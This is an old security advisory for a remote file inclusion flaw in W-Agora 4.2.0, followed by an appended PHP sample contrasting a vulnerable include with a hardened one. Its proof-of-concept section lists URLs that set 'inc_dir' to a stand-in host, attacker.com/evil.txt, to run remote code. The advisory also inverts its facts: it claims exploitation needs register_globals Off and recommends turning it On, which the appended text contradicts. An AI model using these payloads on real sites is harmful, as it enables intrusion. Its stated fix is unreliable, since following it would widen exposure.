ECHO.OR.ID ECHO_ADV_34$2006
---------------------------------------------------------------------------------------------------
[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
---------------------------------------------------------------------------------------------------

Author       : Dedi Dwianto a.k.a the_day
Date Found   : June, 20th 2006
Location     : Indonesia, Jakarta
web          : http://advisories.echo.or.id/adv/adv34-theday-2006.txt
Critical Lvl : Highly critical
Impact       : System access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

W-Agora (Web-Agora)

Application : W-Agora (Web-Agora)
version     : <= 4.2.0
URL         : http://w-agora.net

Description :
W-Agora (Web-Agora) is a database-driven communications system which allows you and your visitors to store and display messages, files, and other information on your web site. More than "just another Web BBS/forum software", W-Agora is designed so it can be easily customized through a Web browser and the use of templates. It can be used as a BBS, guestbook, download area, or publishing system. Several database backends are supported, such as MySQL, Postgres, mSQL, Oracle and DBM.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~

-----------------------insert.php----------------------
....
        indexNotes();
    }
?>
...
----------------------------------------------------------

Input passed to the "inc_dir" parameter in insert.php is not properly verified before being used.
This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Affected files:

admin_notes.php
admin_subscribed_user.php
admin_user.php
browse_avatar.php
close.php
create_forum.php
create_site.php
create_user.php
delete.php
delete_site.php
download_forum.php
editconf.php
edit_site.php
export.php
forgot_password.php
index.php
insert.php
search.php
view.php
update.php
setup.php
profile.php
register.php
rss.php
list.php
include/mail.php
include/fileupload.php
include/msql.php
include/dbaccess.php
include/form.php
include/postgres65.php
include/postgres.php
include/mysql.php
extras/quicklist.php
extras/shared_user.php
user/ldap_example.php
tools/upgrade_401.php
tools/upgrade_402.php
tools/upgrade_42.php
tools/upgrade_site_401.php
tools/upgrade_site_402.php

Successful exploitation requires that "register_globals= Off".

Proof Of Concept:
~~~~~~~~~~~~~~~~~

http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt?
http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt?
and likewise for the other affected files listed above.

Solution:
~~~~~~~~~
Change register_globals= On in php.ini
---------------------------------------------------------------------------

Shoutz:
~~~~~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ Lieur-Euy,Mr_ny3m,bithedz,an0maly
~ newbie_hacker[at]yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------

Contact:
~~~~~~~~
the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
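Added example, not taken from the advisory or from W-Agora's source: a hypothetical PHP include pattern of the kind the Vulnerability section describes (an include path built from a variable that request input can populate), beside a hardened version in which the include directory is a fixed constant, the module name is allow-listed, and the resolved path is checked to stay inside that directory. The function names, module names and `include/` layout are assumptions.

```php
<?php
// Added example (hypothetical, not W-Agora's code).

// --- Vulnerable pattern ---------------------------------------------------
// When PHP registers request parameters as globals, a request carrying
// ?inc_dir=... can define $inc_dir before this code runs. include() then
// loads whatever path that value names: a remote URL if allow_url_fopen /
// allow_url_include permit it, or an arbitrary local file.
function load_db_layer_vulnerable(): void
{
    global $inc_dir;                       // may already be request-supplied
    include $inc_dir . '/dbaccess.php';    // include path is not ours to trust
}

// --- Hardened pattern -----------------------------------------------------
// 1. The include directory is a constant, never derived from request data.
// 2. The module name is validated against an explicit allow-list.
// 3. realpath() confirms the resolved file still lives under INC_DIR.
define('INC_DIR', __DIR__ . '/include');

const ALLOWED_MODULES = ['dbaccess', 'form', 'mail'];

function load_module(string $name): string
{
    if (!in_array($name, ALLOWED_MODULES, true)) {
        throw new InvalidArgumentException("unknown module: $name");
    }
    $base = realpath(INC_DIR);
    $path = realpath(INC_DIR . '/' . $name . '.php');
    // realpath() returns false for missing files; the prefix test rejects
    // anything that resolved (e.g. via symlink) outside the include dir.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("module not available: $name");
    }
    require_once $path;
    return $path;
}

// The caller, not the request, chooses the module. With a real
// include/dbaccess.php in place this prints its resolved path; otherwise
// the guard above reports the failure instead of including anything.
try {
    echo load_module('dbaccess'), PHP_EOL;
} catch (Throwable $e) {
    echo 'refused: ', $e->getMessage(), PHP_EOL;
}
```

Turning register_globals off in php.ini removes the route by which a query parameter becomes `$inc_dir` in the first place, and leaving allow_url_include off keeps include() from fetching remote URLs even if a path variable is ever tainted again.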